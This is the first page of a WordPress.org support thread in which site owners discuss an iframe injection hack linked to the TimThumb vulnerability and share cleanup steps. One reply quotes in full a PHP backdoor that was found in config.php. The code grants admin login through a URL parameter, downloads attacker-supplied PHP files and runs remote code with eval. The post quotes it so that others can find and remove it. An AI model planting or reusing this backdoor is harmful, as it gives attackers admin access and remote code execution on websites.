Title: [TimThumb Vulnerability] iframe hack Last modified: August 20, 2016 --- # [TimThumb Vulnerability] iframe hack * [x1code](https://wordpress.org/support/users/secretja/) * (@secretja) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/) * Hi, * have somebody more info about * ``` ``` * Somebody hacked all my WP sites… * THX to all who will help. Viewing 15 replies - 1 through 15 (of 59 total) 1 [2](https://wordpress.org/support/topic/iframe-hack-3/page/2/?output_format=md) [3](https://wordpress.org/support/topic/iframe-hack-3/page/3/?output_format=md) [4](https://wordpress.org/support/topic/iframe-hack-3/page/4/?output_format=md) [→](https://wordpress.org/support/topic/iframe-hack-3/page/2/?output_format=md) * [milescatlett](https://wordpress.org/support/users/milescatlett/) * (@milescatlett) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249248) * I am hosted on Bluehost.com. I was speaking to a customer service rep today. He said he noticed this appearing in an iframe on a non-Wordpress site. I have this on some of my sites also. I would appreciate any information anyone has. * Thanks * Miles * Thread Starter [x1code](https://wordpress.org/support/users/secretja/) * (@secretja) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249254) * I ha have re upload all wp sites and now is all ok. One one non wp site I notice the same thing but I did the same like and wit wp sites. * Good luck Miles. * [ToucanCreative](https://wordpress.org/support/users/toucancreative/) * (@toucancreative) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249260) * I just got this exact iframe hack on my wordpress site. I have scoured many many files, run antivirus/malware checks on the whole site without any success. I am hosted with VentraIP.com.au. This seems like a new hack given OP posted 2 hours ago. I noticed this just yesterday. * [Spirit_of_Martin](https://wordpress.org/support/users/spirit_of_martin/) * (@spirit_of_martin) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249304) * Look in config.php * delete code: * ``` if (isset($_GET['pingnow'])&& isset($_GET['pass'])){ if ($_GET['pass'] == ''){ if ($_GET['pingnow']== 'login'){ $user_login = 'admin'; $user = get_userdatabylogin($user_login); $user_id = $user->ID; wp_set_current_user($user_id, $user_login); wp_set_auth_cookie($user_id); do_action('wp_login', $user_login); } if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); $fnm = md5(rand(0,100)).'.php'; $fp = fopen($fnm, "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); fclose($fp); echo ""; } if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){ $ch = curl_init($_GET['file']); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $re = curl_exec($ch); curl_close($ch); eval($re); }}} ``` * There is somwhere else, still looking. I don’t know how they hack the site… * Regards! * [ToucanCreative](https://wordpress.org/support/users/toucancreative/) * (@toucancreative) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249305) * I also re-uploaded my WP files, and everything seems to be in order again – for now at least! * [baluba](https://wordpress.org/support/users/baluba/) * (@baluba) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249311) * Interesting, seeing the same iframe code in some of my Joomla sites too. * [milescatlett](https://wordpress.org/support/users/milescatlett/) * (@milescatlett) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249319) * I’m not sure what it does, but I have had sites that have been redirecting to other locations (sometimes sleezy, music playing, etc…). * But I have also been upgrading timthumb so those things could be related to that. * [@secretja](https://wordpress.org/support/users/secretja/), What do you mean by reupload? Are you installing a fresh theme, or exporting the content of an old site and creating a new wordpress site? I’m afraid to download the whole database for fear it might have malicious code in it… * Thanks for all your help…. * Thread Starter [x1code](https://wordpress.org/support/users/secretja/) * (@secretja) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249320) * Hi, * it is not in theme files… somewhere else it is. I downloaded fresh wp and I have upload/upgrade all wp sites. Now is OK. * [Elmo_is_evil](https://wordpress.org/support/users/elmo_is_evil/) * (@elmo_is_evil) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249324) * Got this as well after being affected by PHPRemoteView via timthumb …. * Now PHPRemoteView is gone, timthumb is up to date, but after removing it yesterday( In my case a JS), it came back this morning … * Mine was embedded in a JS, \wp-includes\js\l10n.js yesterday, and this morning\ wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. The code is obfuscated…. * I already mention it on a PHPRemoteView topic …. * [http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404](http://wordpress.org/support/topic/two-strange-errors?replies=22#post-2289404) * Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * (@ipstenu) * 🏳️‍🌈 Advisor and Activist * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249331) * Once you’ve removed TimThumb, you STILL need to perform the usual steps. * 1) Change ALL YOUR PASSWORD 2) Scan ALL your files (esp .htaccess) for anything hinky. * Best would be to delete and re-upload everything fresh, and then change every single password, from WP to FTP and SQL. * [Elmo_is_evil](https://wordpress.org/support/users/elmo_is_evil/) * (@elmo_is_evil) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249334) * Damn sometime i’m a tool, i just forgot to upload the clean wp-config.php …. * Anyway, still looking to be sure …. * Spirit_of_Martin, my php is a little bit rusty, but, basically, this bit of php, gave the attacker the cookie of the admin, in the first condition, the second look like some kind of scanner/patcher, and the third a file downloader …. * My guess is that there’s a tool on top of it (On another server or computer) …. * [Devin Walker](https://wordpress.org/support/users/dlocc/) * (@dlocc) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249346) * The same thing happened to us today on our site. We’ve been getting hit with attacks all seemingly coming from the timthumb vulnerability. We have updated timthumb but this keeps happening. I’m guessing there’s a missing back door somewhere. * What’s really concerning to me is that my site’s database password has been commented out and changed. I’m wondering if there’s anything wrong with my database now… * Thread Starter [x1code](https://wordpress.org/support/users/secretja/) * (@secretja) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249353) * I got it again. Damn. * Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * (@ipstenu) * 🏳️‍🌈 Advisor and Activist * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249356) * Then you’re not cleaning it up right. * Best way at this point would be to do this: 1) backup EVERYTHING to your PC. Files and DB. * 2) DELETE the files on your server. Yeah. Don’t worry, your posts are on your database, we’re leaving that alone. * 3) Change your passwords fro SSH/FTP and SQL * 4) On your PC, review the following files: .htaccess wp-config.php * They look okay? Good. Copy them back up to your server (remember to edit your wp-config.php with your new SQL password). * 5) Get FRESH and CLEAN downloads of WordPress, all your themes and plugins * 6) As soon as you get in, change your passwords. * [milescatlett](https://wordpress.org/support/users/milescatlett/) * (@milescatlett) * [14 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack-3/#post-2249371) * This may be a dumb question, but I can see counter-wordpress loading on my site. However, when I right click on the page to view source or try to view it in firebug, I can’t find an iframe or “counter” in the source code. Where is it, so I can know if it’s gone? Viewing 15 replies - 1 through 15 (of 59 total) 1 [2](https://wordpress.org/support/topic/iframe-hack-3/page/2/?output_format=md) [3](https://wordpress.org/support/topic/iframe-hack-3/page/3/?output_format=md) [4](https://wordpress.org/support/topic/iframe-hack-3/page/4/?output_format=md) [→](https://wordpress.org/support/topic/iframe-hack-3/page/2/?output_format=md) The topic ‘[TimThumb Vulnerability] iframe hack’ is closed to new replies. ## Tags * [iframe hack](https://wordpress.org/support/topic-tag/iframe-hack/) * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/) * 59 replies * 22 participants * Last reply from: [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/) * Last activity: [14 years, 5 months ago](https://wordpress.org/support/topic/iframe-hack-3/page/4/#post-2249501) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics